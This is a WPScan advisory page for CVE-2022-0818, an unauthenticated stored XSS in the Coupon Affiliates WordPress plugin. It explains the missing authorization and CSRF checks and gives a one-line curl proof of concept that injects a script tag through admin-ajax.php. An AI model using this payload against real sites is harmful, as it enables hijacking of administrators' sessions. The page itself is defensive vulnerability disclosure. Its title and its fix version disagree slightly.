WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Coupon Affiliates < 4.16.4.5 - Unauthenticated Stored XSS

Description

The plugin does not have authorization and CSRF checks on a specific action handler, as well as does not sanitize its settings, which enables an unauthenticated attacker to inject malicious XSS payloads into the settings page of the plugin.

Proof of Concept

curl https://example.com/wp-admin/admin-ajax.php --data 'action=wcu-update-text&option=wcusage_field_orders&value="></input><script>alert("xss");</script><input'

The XSS will be triggered in the Settings page of the plugin (/wp-admin/admin.php?page=wcusage_settings)

Affects Plugins

woo-coupon-usage
Fixed in version 4.16.4

References

CVE
CVE-2022-0818

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
c43fabb4-b388-462c-adc4-c6b25af7043b

Timeline

Publicly Published

2022-03-02 (about 4 months ago)

Added

2022-03-02 (about 4 months ago)

Last Updated

2022-04-08 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin